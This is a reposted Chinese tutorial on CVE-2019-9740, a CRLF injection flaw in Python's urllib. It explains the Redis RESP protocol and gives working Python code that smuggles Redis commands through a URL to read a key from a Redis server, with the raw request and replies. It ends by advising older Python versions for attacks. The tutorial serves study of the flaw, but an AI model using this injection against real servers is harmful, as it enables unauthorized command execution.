码迷,mamicode.com
首页 > 其他好文 > 详细

CRLF注入

时间:2021-01-18 11:31:42      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:支持   ati   lag   pytho   res   import   返回   rom   uri   

CRLF注入

  • Title: [CVE-2019-9740] Python urllib CRLF injection vulnerability
  • Category: security
  • Stage: resolved
  • Components: Library(Lib)
  • Versions: Python 3.8, Python 3.7, Python 2.7

Redis使用的协议

? Redis客户端使用RESP(Redis序列化协议)与Redis服务器之间进行通信。该协议专为Redis设计,但也可用于其它客户端-服务器(Client-Server)软件项目。

RESP简单字符串(RESP Simple Strings)

? 简单字符串使用以下方式编码:以+(加号符号)开始,后跟一个不能包含CR或LF字符的字符串(不允许换行符),以CRLF(即"\r\n")结尾。

? 简单字符串用于以最小开销传输非二进制安全的字符。例如,许多Redis命令在成功时回复“OK”,因为RESP Simple String使用以下5个字节进行编码:

? +OK\r\n

RESP大容量字符串(RESP Bulk Strings)

? 大容量字符串用于表达长达512MB的单个二进制安全字符串。

? 大容量字符串使用如下的编码方式:

	1. 一个以“$”字节开始,后面是组成字符串长度的字节数(前缀长度),由CRLF终止;
	2. 实际的字符串数据;
	3. 最终的CRLF。

? 字符串“foobar”被编码为:

? "$6\r\nfoobar\r\n"

? 空字符串为:

? "$0\r\n\r\n"

? 另外还可以使用RESP Bulk Strings的特殊格式表示空值。在这种特殊格式中,长度为-1,并且没有数据,所以空值表示为(Null Bulk String):

? "$-1\r\n"

? 当服务器使用空字符串进行回复时,客户端库API不应该返回空字符串,而是返回一个nil对象。例如,Ruby库应该返回‘nil‘,C库应该返回NULL(或者在应答对象中设置特殊标志)。

RESP数组(RESP Arrays)

? Redis使用RESP数组发送命令到Redis服务器。同样,某些Redis命令使用RESP数组作为回复类型,将元素集合返回给客户端。一个例子是返回列表元素的LRANGE命令。

? RESP数组使用以下格式发送:

	1. 一个“*”字符作为第一个字符,后面为十进制数字,该数字是数组中的元素个数,然后是CRLF;
	2. Array的每个元素都有一个额外的RESP类型。

? 所以一个空的Array只含有以下内容:

? "*0\r\n"

? 两个RESP批量字符串“foo”和“bar”的数组编码为:

? "*2\r\n$3\r\nfoo\r\n$3\r\nbar\r\n"

? *<count>CRLF部分作为数组的前缀,组成数组的其它数据类型只是依次连接在一起。例如,一个含有三个整数的数组编码为:

? "*3\r\n:1\r\n:2\r\n:3\r\n"

? 数组可以包含混合类型,元素之间不必是同一类型。例如,由四个整数和一个字符串块组成的列表可以编码为:

? *5\r\n:1\r\n:2\r\n:3\r\n:4\r\n:abc\r\n

利用urllib简单构造

? 现分别构造对百度和对某个Redis服务器的请求。

#目标为百度
import urllib.request

host=‘www.baidu.com‘
url=f‘http://{host}/‘
resp=urllib.request.urlopen(url)
print(resp.read())
#目标为某个Redis服务器
#假设Redis服务器数据库存有键值对{‘flag‘:‘is_flag‘}
import urllib.request

host=‘114.55.65.251:46379?\r\n*2\r\n$3\r\nget\r\n$4\r\nflag\r\n‘#发送get flag命令
url=f‘http://{host}/‘
resp=urllib.request.urlopen(url)
print(resp.read())

? 两者请求信息对比:

GET / HTTP/1.1
Host: www.baidu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
GET /?
*2
$3
get
$4
flag
 HTTP/1.1
Host: 114.55.65.251:46379
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

? 对Redis请求实际上返回了多个结果:

请求内容(GET) 返回结果
/? $-1\r\n(Redis无法识别)
*2\r\n$3\r\nget\r\n$4\r\nflag\r\n $7\r\n(即‘is_flag‘)
后续内容 -ERR unknown command /, with...

小结

? CRLF注入对于较新版本的Python完全无效。例如Python 3.8.3中的urllib已经过滤了操作符,当构造上面的请求时,会有如下报错:

? http.client.InvalidURL: URL can‘t contain control characters. ‘/?\r\n*2\r\n$3\r\nget\r\n$4\r\nflag\r\n/‘ (found at least ‘\r‘)

? 但是攻击实践中一般不会使用较新的Python版本,而是习惯于使用“经典版本”(如Python 2.7、Python 3.6),以达到对工具运行环境的稳定支持,这也方便于CRLF注入的展开。

? 现今大型网站基本会完全过滤操作符,也很少存在对用户输入直接输出的设计,不过CRLF仍旧值得一试。

CRLF注入

标签:支持   ati   lag   pytho   res   import   返回   rom   uri   

原文地址:https://www.cnblogs.com/4thrun/p/CRLF_injection.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!